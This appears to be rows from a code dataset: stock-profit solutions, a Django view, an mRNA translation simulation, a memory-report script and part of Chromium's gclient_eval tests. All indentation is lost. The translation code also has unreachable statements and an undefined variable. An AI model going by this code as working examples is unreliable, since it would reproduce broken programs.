content
stringlengths 5
1.05M
|
|---|
class Solution:
def maxProfit(self, prices: List[int]) -> int:
min_p = 10**5 + 1
max_p = 0
cnt = 0
for p in prices:
if p > max_p:
max_p = p
if p < min_p:
min_p = p
max_p = 0
diff = max_p - min_p
if cnt < diff:
cnt = diff
return cnt
class Solution:
def maxProfit(self, prices: List[int]) -> int:
p_min = prices[0]
p_return = 0
for price in prices:
if price < p_min:
p_min = price
else:
p_return = max(p_return, price - p_min)
return p_return
class Solution:
def maxProfit(self, prices: List[int]) -> int:
max_profit = 0
first = float("inf")
for num in prices:
if first > num:
first = num
else:
diff = num - first
if diff > max_profit:
max_profit = diff
return max_profit
|
from django.shortcuts import render
# Create your views here.
def index(request):
template_name = "reactify/index.html"
return render(request, template_name)
|
import processes
import random
import database
from molecules import Ribo, Protein, MRNA, PopulationCollection, ParticleCollection
class Translation(processes.Process):
"""
Translation is instantiated in the Cell to produce proteins.
Defines Translation process. It iterates over all ribosomes and decides what
they should do. They either bind to mRNA or elongate/terminate a protein if
they are already bound.
"""
def __init__(self, name, model):
# call the constructor of the base class (processes.Process in this case)
super().__init__(name, model)
def __str__(self):
# return string output of translation process
# todo: each process class should define this
return "Translation process for mRNAs: {}".format(list(self.model.states['mRNA']))
def update(self):
"""
Update all mrnas and translate proteins.
"""
for mrna_id in self.model.states[MRNA].molecules:
for mrna in self.model.states[MRNA].molecules[mrna_id]:
#self.initiate(mrna)
self.elongate(mrna)
def initiate(self, mrna):
"""
Try to bind to a given MRNA. Binding probability corresponds to the ribosome count.
@type mrna: MRNA
""""""
# if not bound already and if ribosomes available
if mrna.bindings == [] and self.model.states[Ribo].molecules['free ribos'] > 0:
mrna.bindings.append('ribo')
self.model.states[Ribo].take('free ribos')
self.model.states[Ribo].add(Ribo('bound ribos'))"""
#mrna.bindings = ([[0,0,[]]]*len(mrna.sequence))
for ooo in range(int(len(mrna.sequence)/3)):
mrna.bindings.append([0,0,[]])
#print(mrna.sequence)
#print(len(mrna.sequence))
for posi in range((len(mrna.bindings))-2):
if mrna.sequence[posi] == 'A':
if mrna.sequence[posi +1] == 'U':
if mrna.sequence[posi +2] == 'G':
mrna.bindings[posi][0] = 1
break
elif mrna.sequence[posi] == 'G':
if mrna.sequence[posi +1] == 'U':
if mrna.sequence[posi +2] == 'G':
mrna.bindings[posi][0] = 1
break
elif mrna.sequence[posi] == 'U':
if mrna.sequence[posi +1] == 'U':
if mrna.sequence[posi +2] == 'G':
mrna.bindings[posi][0] = 1
break
#print(mrna.bindings)
def elongate(self, mrna):
"""
Elongate the new protein by the correct amino acid. Check if an
MRNA is bound and if ribosome can move to next codon.
Terminate if the ribosome reaches a STOP codon.
""" """
if 'ribo' in mrna.bindings:
prot = Protein(mrna.name.lower().capitalize()) # protein names are like mRNA names, but only capitalized
for i in range(int(len(mrna.sequence) / 3)): # go through codons
codon = mrna.sequence[ i:i + 3 ]
amino_acid = database.ModelData.codon_to_amino_acid[codon]
if amino_acid != '*': # if STOP codon
prot.add_monomer(amino_acid)
else:
self.model.states[ Protein ].add(prot)
mrna.bindings.remove('ribo')
self.model.states[ Ribo ].take('bound ribos')
self.model.states[ Ribo ].add(Ribo('free ribos'))
return prot """
for _ in range(10):
# Ribosomen binden:
#print(mrna.bindings)
for pos in range((len(mrna.bindings))):
if mrna.bindings[pos][0]==1:# wenn pos eine Startposition
#belege 50% der Startstellen mit ribosomen
#print(self.model.states[Ribo].molecules['free ribos'])
if mrna.bindings[pos][1]==0:
bindungsw=self.model.states[Ribo].molecules['free ribos']/(self.model.states[Ribo].count())
#print(bindungsw)
if random.random() < 1:#bindungsw:
if self.model.states[Ribo].molecules['free ribos'] > 0:
mrna.bindings[pos][1] = 1
self.model.states[Ribo].take('free ribos')
self.model.states[Ribo].add(Ribo('bound ribos'))
#print(self.model.states[Ribo].molecules['free ribos']+self.model.states[Ribo].molecules['bound ribos'])
print(mrna.bindings)
# für den Fall, dass Ribosom das Ende erreicht hat und kei StoP codon
if mrna.bindings[len(mrna.bindings)-1][1] == 1:
print('a')
#entferne alte Riboposition
mrna.bindings[len(mrna.bindings)-1][1] = 0
#setze Ribo frei
self.model.states[Ribo].take('bound ribos')
self.model.states[Ribo].add(Ribo('free ribos'))
#ergenze alte Sequenz mit Stop Base
print(len(mrna.bindings)*3-3)
print(len(mrna.sequence))
AS=database.ModelData.codon_to_amino_acid[mrna.sequence[len(mrna.bindings)*3-3:len(mrna.bindings)*3]]
mrna.bindings[len(mrna.bindings)-1][2].append(AS)
prot = Protein(mrna.name.lower().capitalize())
self.model.states[ Protein ].add(prot)
return prot
#entferne neue Riboposition
mrna.bindings[basenposi+1][1] = 0
#entferne sequnz
mrna.bindings[basenposi+1][2] = []
'''# baue protein aus sequenz
for i in range(int(len(mrna.bindings[len(mrna.bindings)-1][2]) / 3)): # go through codons
codon = mrna.sequence[ i * 3:i * 3 + 3 ]
amino_acid = database.ModelData.codon_to_amino_acid[codon]
prot = Protein(mrna.name.lower().capitalize()) # protein names are like mRNA names, but only capitalized
if amino_acid != '*': # if STOP codon
prot.add_monomer(amino_acid)
else:
self.model.states[ Protein ].add(prot)
mrna.bindings.remove('ribo')
self.model.states[ Ribo ].take('bound ribos')
self.model.states[ Ribo ].add(Ribo('free ribos'))
return prot
#lösche alten Sequenzteil aus alter Position
mrna.bindings[len(mrna.bindings)-1][2]=[]'''
# lauf funktion
for basenposi in range(len(mrna.bindings)-2,-1,-1): #laufe vom vorletzten bis ersten eintrag
#print (basenposi)
if mrna.bindings[basenposi][1] == 1:#wenn ein Ribo gebunden ist
#entferne alte Riboposition
mrna.bindings[basenposi][1] = 0
#setze neue Ribosomenposition
mrna.bindings[basenposi+1][1] = 1
#kopiere alten Sequenzteil in neuen
mrna.bindings[basenposi+1][2] = (mrna.bindings[basenposi][2]).copy()
#lösche alten Sequenzteil aus alter Position
mrna.bindings[basenposi][2]=[]
#ergenze alte Sequenz an neuer Position mit vorhergehender Base wenn keine Stopsequenz
AS=database.ModelData.codon_to_amino_acid[mrna.sequence[basenposi*3:basenposi*3+3]]
#print(mrna.sequence[basenposi*3:basenposi*3+3])
if AS != '*': # if STOP codon
mrna.bindings[basenposi+1][2].append(AS)
else:
prot = Protein(mrna.name.lower().capitalize())
self.model.states[ Protein ].add(prot)
self.model.states[ Ribo ].take('bound ribos')
self.model.states[ Ribo ].add(Ribo('free ribos'))
return prot
#entferne neue Riboposition
mrna.bindings[basenposi+1][1] = 0
#entferne sequnz
mrna.bindings[basenposi+1][2] = []
def terminate(self, mrna):
"""
Splits the ribosome/MRNA complex and returns a protein.
"""
pass
|
#!/usr/bin/env python3
#
# Summarize breakdown of rom/ram in memory reports
#
# ## Authors
#
# The Veracruz Development Team.
#
# ## Licensing and copyright notice
#
# See the `LICENSE_MIT.markdown` file in the Veracruz root directory for
# information on licensing and copyright.
#
import argparse
import collections as co
import itertools as it
import re
import sys
# note the order matters here, earlier groups are matched first so
# should be more specific
GROUPS = [
('nanopb', ['Tp', 'nanopb']),
('policy', ['policy.c']),
('base64', ['base64']),
('mbedtls', ['mbedtls']),
('net', ['net']),
('vc', ['vc']),
('main', ['samples']),
('zephyr', ['zephyr', 'kernel', 'os', 'drivers', 'arch']),
]
# parse static reports for group-level memory usage
def find_static_groups(report_path):
with open(report_path, encoding="utf-8") as report:
# skip lines before ====
for line in report:
if re.match('^=+$', line):
break
scope = []
groups = co.defaultdict(lambda: 0)
total = 0
# build up paths in ROM report
for line in report:
# skip lines after ====
if re.match('^=+$', line):
# last line should contain total
total = int(next(report))
break
m = re.match('^([ ├└──│]*)([^ ]+) +([0-9]+)', line)
if not m:
continue
depth = len(m.group(1))
name = m.group(2)
size = int(m.group(3))
# remove prev from scope?
while len(scope) > 0 and scope[-1][0] >= depth:
pdepth, pname, psize = scope.pop()
if psize > 0:
pfullname = '/'.join(it.chain(
(ppname for _, ppname, _ in scope),
[pname]))
for group, patterns in GROUPS:
if any(pattern in pfullname for pattern in patterns):
groups[group] += psize
break
else:
groups['misc'] += psize
# remove size from parents?
for i in range(len(scope)):
ppdepth, ppname, ppsize = scope[i]
scope[i] = (ppdepth, ppname, ppsize - psize)
# add to scope?
scope.append((depth, name, size))
return groups, total
# parse dynamic reports for group-level memory usage
def find_dyn_groups(report_path):
with open(report_path) as report:
# first we should find the peak index
peak = 0
for line in report:
m = re.search('([0-9]+) \(peak\)', line)
if m:
peak = int(m.group(1))
break
# now find the peak
for line in report:
m = re.match('^ +([0-9]+) +[0-9,]+ +([0-9,]+) +[0-9,]+ +[0-9,]+ +([0-9,]+)', line)
if m:
n = int(m.group(1))
if n == peak:
heap_total = int(m.group(2).replace(',', ''))
stack_total = int(m.group(3).replace(',', ''))
break
# following this is more details, parse
heap_groups = co.defaultdict(lambda: 0)
size = 0
nested_lines = []
for line in report:
if re.match('->', line):
# add previous parse
if size > 0:
for group, patterns in GROUPS:
if any(pattern in nested_line
for pattern in patterns
for nested_line in nested_lines):
heap_groups[group] += size
break
else:
heap_groups['misc'] += size
# start next parse
m = re.search('\(([0-9,]+)B\)', line)
size = int(m.group(1).replace(',', ''))
nested_lines = [line]
elif re.match('[ |]*->', line):
nested_lines.append(line)
# we can't find stack this way
stack_groups = co.defaultdict(lambda: 0)
stack_groups['misc'] = stack_total
return (heap_groups, heap_total, stack_groups, stack_total)
def main(args):
# find groups
code_groups, code_total = find_static_groups(args.rom_report)
static_groups, static_total = find_static_groups(args.static_ram_report)
heap_groups, heap_total, stack_groups, stack_total = find_dyn_groups(args.dyn_ram_report)
print("%-12s %7s %7s %7s %7s" % ('', 'code', 'static', 'heap', 'stack'))
for group, _ in it.chain(sorted(GROUPS), [('misc', [])]):
print("%-12s %7d %7d %7d %7d" % (
group,
code_groups[group],
static_groups[group],
heap_groups[group],
stack_groups[group]))
print("%-12s %7d %7d %7d %7d" % (
'TOTAL',
code_total,
static_total,
heap_total,
stack_total))
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Summarize breakdown of rom/ram in memory reports')
parser.add_argument('rom_report',
help='ROM report output from Zephyr')
parser.add_argument('static_ram_report',
help='Static RAM report output from Zephyr')
parser.add_argument('dyn_ram_report',
help='Dynamic RAM report output from Valgrin\'s Massif tool')
args = parser.parse_args()
main(args)
|
#!/usr/bin/env vpython3
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import itertools
import logging
import os
import sys
import unittest
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from third_party import schema
import metrics
# We have to disable monitoring before importing gclient.
metrics.DISABLE_METRICS_COLLECTION = True
import gclient
import gclient_eval
import gclient_utils
class GClientEvalTest(unittest.TestCase):
def test_str(self):
self.assertEqual('foo', gclient_eval._gclient_eval('"foo"'))
def test_tuple(self):
self.assertEqual(('a', 'b'), gclient_eval._gclient_eval('("a", "b")'))
def test_list(self):
self.assertEqual(['a', 'b'], gclient_eval._gclient_eval('["a", "b"]'))
def test_dict(self):
self.assertEqual({'a': 'b'}, gclient_eval._gclient_eval('{"a": "b"}'))
def test_name_safe(self):
self.assertEqual(True, gclient_eval._gclient_eval('True'))
def test_name_unsafe(self):
with self.assertRaises(ValueError) as cm:
gclient_eval._gclient_eval('UnsafeName')
self.assertIn('invalid name \'UnsafeName\'', str(cm.exception))
def test_invalid_call(self):
with self.assertRaises(ValueError) as cm:
gclient_eval._gclient_eval('Foo("bar")')
self.assertIn('Var is the only allowed function', str(cm.exception))
def test_expands_vars(self):
self.assertEqual(
'foo',
gclient_eval._gclient_eval('Var("bar")', vars_dict={'bar': 'foo'}))
def test_expands_vars_with_braces(self):
self.assertEqual(
'foo',
gclient_eval._gclient_eval('"{bar}"', vars_dict={'bar': 'foo'}))
def test_invalid_var(self):
with self.assertRaises(KeyError) as cm:
gclient_eval._gclient_eval('"{bar}"', vars_dict={})
self.assertIn('bar was used as a variable, but was not declared',
str(cm.exception))
def test_plus(self):
self.assertEqual('foo', gclient_eval._gclient_eval('"f" + "o" + "o"'))
def test_format(self):
self.assertEqual('foo', gclient_eval._gclient_eval('"%s" % "foo"'))
def test_not_expression(self):
with self.assertRaises(SyntaxError) as cm:
gclient_eval._gclient_eval('def foo():\n pass')
self.assertIn('invalid syntax', str(cm.exception))
def test_not_whitelisted(self):
with self.assertRaises(ValueError) as cm:
gclient_eval._gclient_eval('[x for x in [1, 2, 3]]')
self.assertIn(
'unexpected AST node: <_ast.ListComp object', str(cm.exception))
def test_dict_ordered(self):
for test_case in itertools.permutations(range(4)):
input_data = ['{'] + ['"%s": "%s",' % (n, n) for n in test_case] + ['}']
expected = [(str(n), str(n)) for n in test_case]
result = gclient_eval._gclient_eval(''.join(input_data))
self.assertEqual(expected, list(result.items()))
class ExecTest(unittest.TestCase):
def test_multiple_assignment(self):
with self.assertRaises(ValueError) as cm:
gclient_eval.Exec('a, b, c = "a", "b", "c"')
self.assertIn(
'invalid assignment: target should be a name', str(cm.exception))
def test_override(self):
with self.assertRaises(ValueError) as cm:
gclient_eval.Exec('a = "a"\na = "x"')
self.assertIn(
'invalid assignment: overrides var \'a\'', str(cm.exception))
def test_schema_wrong_type(self):
with self.assertRaises(gclient_utils.Error):
gclient_eval.Exec('include_rules = {}')
def test_recursedeps_list(self):
local_scope = gclient_eval.Exec(
'recursedeps = [["src/third_party/angle", "DEPS.chromium"]]')
self.assertEqual(
{'recursedeps': [['src/third_party/angle', 'DEPS.chromium']]},
local_scope)
def test_var(self):
local_scope = gclient_eval.Exec('\n'.join([
'vars = {',
' "foo": "bar",',
'}',
'deps = {',
' "a_dep": "a" + Var("foo") + "b",',
'}',
]))
self.assertEqual({
'vars': collections.OrderedDict([('foo', 'bar')]),
'deps': collections.OrderedDict([('a_dep', 'abarb')]),
}, local_scope)
def test_braces_var(self):
local_scope = gclient_eval.Exec('\n'.join([
'vars = {',
' "foo": "bar",',
'}',
'deps = {',
' "a_dep": "a{foo}b",',
'}',
]))
self.assertEqual({
'vars': collections.OrderedDict([('foo', 'bar')]),
'deps': collections.OrderedDict([('a_dep', 'abarb')]),
}, local_scope)
def test_empty_deps(self):
local_scope = gclient_eval.Exec('deps = {}')
self.assertEqual({'deps': {}}, local_scope)
def test_overrides_vars(self):
local_scope = gclient_eval.Exec('\n'.join([
'vars = {',
' "foo": "bar",',
'}',
'deps = {',
' "a_dep": "a{foo}b",',
'}',
]), vars_override={'foo': 'baz'})
self.assertEqual({
'vars': collections.OrderedDict([('foo', 'bar')]),
'deps': collections.OrderedDict([('a_dep', 'abazb')]),
}, local_scope)
def test_doesnt_override_undeclared_vars(self):
with self.assertRaises(KeyError) as cm:
gclient_eval.Exec('\n'.join([
'vars = {',
' "foo": "bar",',
'}',
'deps = {',
' "a_dep": "a{baz}b",',
'}',
]), vars_override={'baz': 'lalala'})
self.assertIn('baz was used as a variable, but was not declared',
str(cm.exception))
def test_doesnt_allow_duplicate_deps(self):
with self.assertRaises(ValueError) as cm:
gclient_eval.Parse('\n'.join([
'deps = {',
' "a_dep": {',
' "url": "a_url@a_rev",',
' "condition": "foo",',
' },',
' "a_dep": {',
' "url": "a_url@another_rev",',
' "condition": "not foo",',
' }',
'}',
]), '<unknown>')
self.assertIn('duplicate key in dictionary: a_dep', str(cm.exception))
class UpdateConditionTest(unittest.TestCase):
def test_both_present(self):
info = {'condition': 'foo'}
gclient_eval.UpdateCondition(info, 'and', 'bar')
self.assertEqual(info, {'condition': '(foo) and (bar)'})
info = {'condition': 'foo'}
gclient_eval.UpdateCondition(info, 'or', 'bar')
self.assertEqual(info, {'condition': '(foo) or (bar)'})
def test_one_present_and(self):
# If one of info's condition or new_condition is present, and |op| == 'and'
# then the the result must be the present condition.
info = {'condition': 'foo'}
gclient_eval.UpdateCondition(info, 'and', None)
self.assertEqual(info, {'condition': 'foo'})
info = {}
gclient_eval.UpdateCondition(info, 'and', 'bar')
self.assertEqual(info, {'condition': 'bar'})
def test_both_absent_and(self):
# Nothing happens
info = {}
gclient_eval.UpdateCondition(info, 'and', None)
self.assertEqual(info, {})
def test_or(self):
# If one of info's condition and new_condition is not present, then there
# shouldn't be a condition. An absent value is treated as implicitly True.
info = {'condition': 'foo'}
gclient_eval.UpdateCondition(info, 'or', None)
self.assertEqual(info, {})
info = {}
gclient_eval.UpdateCondition(info, 'or', 'bar')
self.assertEqual(info, {})
info = {}
gclient_eval.UpdateCondition(info, 'or', None)
self.assertEqual(info, {})
class EvaluateConditionTest(unittest.TestCase):
def test_true(self):
self.assertTrue(gclient_eval.EvaluateCondition('True', {}))
def test_variable(self):
self.assertFalse(gclient_eval.EvaluateCondition('foo', {'foo': 'False'}))
def test_variable_cyclic_reference(self):
with self.assertRaises(ValueError) as cm:
self.assertTrue(gclient_eval.EvaluateCondition('bar', {'bar': 'bar'}))
self.assertIn(
'invalid cyclic reference to \'bar\' (inside \'bar\')',
str(cm.exception))
def test_operators(self):
self.assertFalse(gclient_eval.EvaluateCondition(
'a and not (b or c)', {'a': 'True', 'b': 'False', 'c': 'True'}))
def test_expansion(self):
self.assertTrue(gclient_eval.EvaluateCondition(
'a or b', {'a': 'b and c', 'b': 'not c', 'c': 'False'}))
def test_string_equality(self):
self.assertTrue(gclient_eval.EvaluateCondition(
'foo == "baz"', {'foo': '"baz"'}))
self.assertFalse(gclient_eval.EvaluateCondition(
'foo == "bar"', {'foo': '"baz"'}))
def test_string_inequality(self):
self.assertTrue(gclient_eval.EvaluateCondition(
'foo != "bar"', {'foo': '"baz"'}))
self.assertFalse(gclient_eval.EvaluateCondition(
'foo != "baz"', {'foo': '"baz"'}))
def test_triple_or(self):
self.assertTrue(gclient_eval.EvaluateCondition(
'a or b or c', {'a': 'False', 'b': 'False', 'c': 'True'}))
self.assertFalse(gclient_eval.EvaluateCondition(
'a or b or c', {'a': 'False', 'b': 'False', 'c': 'False'}))
def test_triple_and(self):
self.assertTrue(gclient_eval.EvaluateCondition(
'a and b and c', {'a': 'True', 'b': 'True', 'c': 'True'}))
self.assertFalse(gclient_eval.EvaluateCondition(
'a and b and c', {'a': 'True', 'b': 'True', 'c': 'False'}))
def test_triple_and_and_or(self):
self.assertTrue(gclient_eval.EvaluateCondition(
'a and b and c or d or e',
{'a': 'False', 'b': 'False', 'c': 'False', 'd': 'False', 'e': 'True'}))
self.assertFalse(gclient_eval.EvaluateCondition(
'a and b and c or d or e',
{'a': 'True', 'b': 'True', 'c': 'False', 'd': 'False', 'e': 'False'}))
def test_string_bool(self):
self.assertFalse(gclient_eval.EvaluateCondition(
'false_str_var and true_var',
{'false_str_var': 'False', 'true_var': True}))
def test_string_bool_typo(self):
with self.assertRaises(ValueError) as cm:
gclient_eval.EvaluateCondition(
'false_var_str and true_var',
{'false_str_var': 'False', 'true_var': True})
self.assertIn(
'invalid "and" operand \'false_var_str\' '
'(inside \'false_var_str and true_var\')',
str(cm.exception))
def test_non_bool_in_or(self):
with self.assertRaises(ValueError) as cm:
gclient_eval.EvaluateCondition(
'string_var or true_var',
{'string_var': 'Kittens', 'true_var': True})
self.assertIn(
'invalid "or" operand \'Kittens\' '
'(inside \'string_var or true_var\')',
str(cm.exception))
def test_non_bool_in_and(self):
with self.assertRaises(ValueError) as cm:
gclient_eval.EvaluateCondition(
'string_var and true_var',
{'string_var': 'Kittens', 'true_var': True})
self.assertIn(
'invalid "and" operand \'Kittens\' '
'(inside \'string_var and true_var\')',
str(cm.exception))
def test_tuple_presence(self):
self.assertTrue(gclient_eval.EvaluateCondition(
'foo in ("bar", "baz")', {'foo': 'bar'}))
self.assertFalse(gclient_eval.EvaluateCondition(
'foo in ("bar", "baz")', {'foo': 'not_bar'}))
def test_unsupported_tuple_operation(self):
with self.assertRaises(ValueError) as cm:
gclient_eval.EvaluateCondition('foo == ("bar", "baz")', {'foo': 'bar'})
self.assertIn('unexpected AST node', str(cm.exception))
with self.assertRaises(ValueError) as cm:
gclient_eval.EvaluateCondition('(foo,) == "bar"', {'foo': 'bar'})
self.assertIn('unexpected AST node', str(cm.exception))
class VarTest(unittest.TestCase):
def assert_adds_var(self, before, after):
local_scope = gclient_eval.Exec('\n'.join(before))
gclient_eval.AddVar(local_scope, 'baz', 'lemur')
results = gclient_eval.RenderDEPSFile(local_scope)
self.assertEqual(results, '\n'.join(after))
def test_adds_var(self):
before = [
'vars = {',
' "foo": "bar",',
'}',
]
after = [
'vars = {',
' "baz": "lemur",',
' "foo": "bar",',
'}',
]
self.assert_adds_var(before, after)
def test_adds_var_twice(self):
local_scope = gclient_eval.Exec('\n'.join([
'vars = {',
' "foo": "bar",',
'}',
]))
gclient_eval.AddVar(local_scope, 'baz', 'lemur')
gclient_eval.AddVar(local_scope, 'v8_revision', 'deadbeef')
result = gclient_eval.RenderDEPSFile(local_scope)
self.assertEqual(result, '\n'.join([
'vars = {',
' "v8_revision": "deadbeef",',
' "baz": "lemur",',
' "foo": "bar",',
'}',
]))
def test_gets_and_sets_var(self):
local_scope = gclient_eval.Exec('\n'.join([
'vars = {',
' "foo": "bar",',
'}',
]))
result = gclient_eval.GetVar(local_scope, 'foo')
self.assertEqual(result, "bar")
gclient_eval.SetVar(local_scope, 'foo', 'baz')
result = gclient_eval.RenderDEPSFile(local_scope)
self.assertEqual(result, '\n'.join([
'vars = {',
' "foo": "baz",',
'}',
]))
def test_gets_and_sets_var_non_string(self):
local_scope = gclient_eval.Exec('\n'.join([
'vars = {',
' "foo": True,',
'}',
]))
result = gclient_eval.GetVar(local_scope, 'foo')
self.assertEqual(result, True)
gclient_eval.SetVar(local_scope, 'foo', 'False')
result = gclient_eval.RenderDEPSFile(local_scope)
self.assertEqual(result, '\n'.join([
'vars = {',
' "foo": False,',
'}',
]))
def test_add_preserves_formatting(self):
before = [
'# Copyright stuff',
'# some initial comments',
'',
'vars = { ',
' # Some comments.',
' "foo": "bar",',
'',
' # More comments.',
' # Even more comments.',
' "v8_revision": ',
' "deadbeef",',
' # Someone formatted this wrong',
'}',
]
after = [
'# Copyright stuff',
'# some initial comments',
'',
'vars = { ',
' "baz": "lemur",',
' # Some comments.',
' "foo": "bar",',
'',
' # More comments.',
' # Even more comments.',
' "v8_revision": ',
' "deadbeef",',
' # Someone formatted this wrong',
'}',
]
self.assert_adds_var(before, after)
def test_set_preserves_formatting(self):
local_scope = gclient_eval.Exec('\n'.join([
'vars = {',
' # Comment with trailing space ',
' "foo": \'bar\',',
'}',
]))
gclient_eval.SetVar(local_scope, 'foo', 'baz')
result = gclient_eval.RenderDEPSFile(local_scope)
self.assertEqual(result, '\n'.join([
'vars = {',
' # Comment with trailing space ',
' "foo": \'baz\',',
'}',
]))
class CipdTest(unittest.TestCase):
def test_gets_and_sets_cipd(self):
local_scope = gclient_eval.Exec('\n'.join([
'deps = {',
' "src/cipd/package": {',
' "packages": [',
' {',
' "package": "some/cipd/package",',
' "version": "deadbeef",',
' },',
' {',
' "package": "another/cipd/package",',
' "version": "version:5678",',
' },',
' ],',
' "condition": "checkout_android",',
' "dep_type": "cipd",',
' },',
'}',
]))
self.assertEqual(
gclient_eval.GetCIPD(
local_scope, 'src/cipd/package', 'some/cipd/package'),
'deadbeef')
self.assertEqual(
gclient_eval.GetCIPD(
local_scope, 'src/cipd/package', 'another/cipd/package'),
'version:5678')
gclient_eval.SetCIPD(
local_scope, 'src/cipd/package', 'another/cipd/package', 'version:6789')
gclient_eval.SetCIPD(
local_scope, 'src/cipd/package', 'some/cipd/package', 'foobar')
result = gclient_eval.RenderDEPSFile(local_scope)
self.assertEqual(result, '\n'.join([
'deps = {',
' "src/cipd/package": {',
' "packages": [',
' {',
' "package": "some/cipd/package",',
' "version": "foobar",',
' },',
' {',
' "package": "another/cipd/package",',
' "version": "version:6789",',
' },',
' ],',
' "condition": "checkout_android",',
' "dep_type": "cipd",',
' },',
'}',
]))
def test_gets_and_sets_cipd_vars(self):
local_scope = gclient_eval.Exec('\n'.join([
'vars = {',
' "cipd-rev": "git_revision:deadbeef",',
' "another-cipd-rev": "version:1.0.3",',
'}',
'deps = {',
' "src/cipd/package": {',
' "packages": [',
' {',
' "package": "some/cipd/package",',
' "version": Var("cipd-rev"),',
' },',
' {',
' "package": "another/cipd/package",',
' "version": "{another-cipd-rev}",',
' },',
' ],',
' "condition": "checkout_android",',
' "dep_type": "cipd",',
' },',
'}',
]))
self.assertEqual(
gclient_eval.GetCIPD(
local_scope, 'src/cipd/package', 'some/cipd/package'),
'git_revision:deadbeef')
self.assertEqual(
gclient_eval.GetCIPD(
local_scope, 'src/cipd/package', 'another/cipd/package'),
'version:1.0.3')
gclient_eval.SetCIPD(
local_scope, 'src/cipd/package', 'another/cipd/package',
'version:1.1.0')
gclient_eval.SetCIPD(
local_scope, 'src/cipd/package', 'some/cipd/package',
'git_revision:foobar')
result = gclient_eval.RenderDEPSFile(local_scope)
self.assertEqual(result, '\n'.join([
'vars = {',
' "cipd-rev": "git_revision:foobar",',
' "another-cipd-rev": "version:1.1.0",',
'}',
'deps = {',
' "src/cipd/package": {',
' "packages": [',
' {',
' "package": "some/cipd/package",',
' "version": Var("cipd-rev"),',
' },',
' {',
' "package": "another/cipd/package",',
' "version": "{another-cipd-rev}",',
' },',
' ],',
' "condition": "checkout_android",',
' "dep_type": "cipd",',
' },',
'}',
]))
def test_preserves_escaped_vars(self):
local_scope = gclient_eval.Exec('\n'.join([
'deps = {',
' "src/cipd/package": {',
' "packages": [',
' {',
' "package": "package/${{platform}}",',
' "version": "version:abcd",',
' },',
' ],',
' "dep_type": "cipd",',
' },',
'}',
]))
gclient_eval.SetCIPD(
local_scope, 'src/cipd/package', 'package/${platform}', 'version:dcba')
result = gclient_eval.RenderDEPSFile(local_scope)
self.assertEqual(result, '\n'.join([
'deps = {',
' "src/cipd/package": {',
' "packages": [',
' {',
' "package": "package/${{platform}}",',
' "version": "version:dcba",',
' },',
' ],',
' "dep_type": "cipd",',
' },',
'}',
]))
class RevisionTest(unittest.TestCase):
def assert_gets_and_sets_revision(self, before, after, rev_before='deadbeef'):
local_scope = gclient_eval.Exec('\n'.join(before))
result = gclient_eval.GetRevision(local_scope, 'src/dep')
self.assertEqual(result, rev_before)
gclient_eval.SetRevision(local_scope, 'src/dep', 'deadfeed')
self.assertEqual('\n'.join(after), gclient_eval.RenderDEPSFile(local_scope))
def test_revision(self):
before = [
'deps = {',
' "src/dep": "https://example.com/dep.git@deadbeef",',
'}',
]
after = [
'deps = {',
' "src/dep": "https://example.com/dep.git@deadfeed",',
'}',
]
self.assert_gets_and_sets_revision(before, after)
def test_revision_new_line(self):
before = [
'deps = {',
' "src/dep": "https://example.com/dep.git@"',
' + "deadbeef",',
'}',
]
after = [
'deps = {',
' "src/dep": "https://example.com/dep.git@"',
' + "deadfeed",',
'}',
]
self.assert_gets_and_sets_revision(before, after)
def test_revision_inside_dict(self):
before = [
'deps = {',
' "src/dep": {',
' "url": "https://example.com/dep.git@deadbeef",',
' "condition": "some_condition",',
' },',
'}',
]
after = [
'deps = {',
' "src/dep": {',
' "url": "https://example.com/dep.git@deadfeed",',
' "condition": "some_condition",',
' },',
'}',
]
self.assert_gets_and_sets_revision(before, after)
def test_follows_var_braces(self):
before = [
'vars = {',
' "dep_revision": "deadbeef",',
'}',
'deps = {',
' "src/dep": "https://example.com/dep.git@{dep_revision}",',
'}',
]
after = [
'vars = {',
' "dep_revision": "deadfeed",',
'}',
'deps = {',
' "src/dep": "https://example.com/dep.git@{dep_revision}",',
'}',
]
self.assert_gets_and_sets_revision(before, after)
def test_follows_var_braces_newline(self):
before = [
'vars = {',
' "dep_revision": "deadbeef",',
'}',
'deps = {',
' "src/dep": "https://example.com/dep.git"',
' + "@{dep_revision}",',
'}',
]
after = [
'vars = {',
' "dep_revision": "deadfeed",',
'}',
'deps = {',
' "src/dep": "https://example.com/dep.git"',
' + "@{dep_revision}",',
'}',
]
self.assert_gets_and_sets_revision(before, after)
def test_follows_var_function(self):
before = [
'vars = {',
' "dep_revision": "deadbeef",',
'}',
'deps = {',
' "src/dep": "https://example.com/dep.git@" + Var("dep_revision"),',
'}',
]
after = [
'vars = {',
' "dep_revision": "deadfeed",',
'}',
'deps = {',
' "src/dep": "https://example.com/dep.git@" + Var("dep_revision"),',
'}',
]
self.assert_gets_and_sets_revision(before, after)
def test_pins_revision(self):
before = [
'deps = {',
' "src/dep": "https://example.com/dep.git",',
'}',
]
after = [
'deps = {',
' "src/dep": "https://example.com/dep.git@deadfeed",',
'}',
]
self.assert_gets_and_sets_revision(before, after, rev_before=None)
def test_preserves_variables(self):
before = [
'vars = {',
' "src_root": "src"',
'}',
'deps = {',
' "{src_root}/dep": "https://example.com/dep.git@deadbeef",',
'}',
]
after = [
'vars = {',
' "src_root": "src"',
'}',
'deps = {',
' "{src_root}/dep": "https://example.com/dep.git@deadfeed",',
'}',
]
self.assert_gets_and_sets_revision(before, after)
def test_preserves_formatting(self):
before = [
'vars = {',
' # Some coment on deadbeef ',
' "dep_revision": "deadbeef",',
'}',
'deps = {',
' "src/dep": {',
' "url": "https://example.com/dep.git@" + Var("dep_revision"),',
'',
' "condition": "some_condition",',
' },',
'}',
]
after = [
'vars = {',
' # Some coment on deadbeef ',
' "dep_revision": "deadfeed",',
'}',
'deps = {',
' "src/dep": {',
' "url": "https://example.com/dep.git@" + Var("dep_revision"),',
'',
' "condition": "some_condition",',
' },',
'}',
]
self.assert_gets_and_sets_revision(before, after)
class ParseTest(unittest.TestCase):
def callParse(self, vars_override=None):
return gclient_eval.Parse('\n'.join([
'vars = {',
' "foo": "bar",',
'}',
'deps = {',
' "a_dep": "a{foo}b",',
'}',
]), '<unknown>', vars_override)
def test_supports_vars_inside_vars(self):
deps_file = '\n'.join([
'vars = {',
' "foo": "bar",',
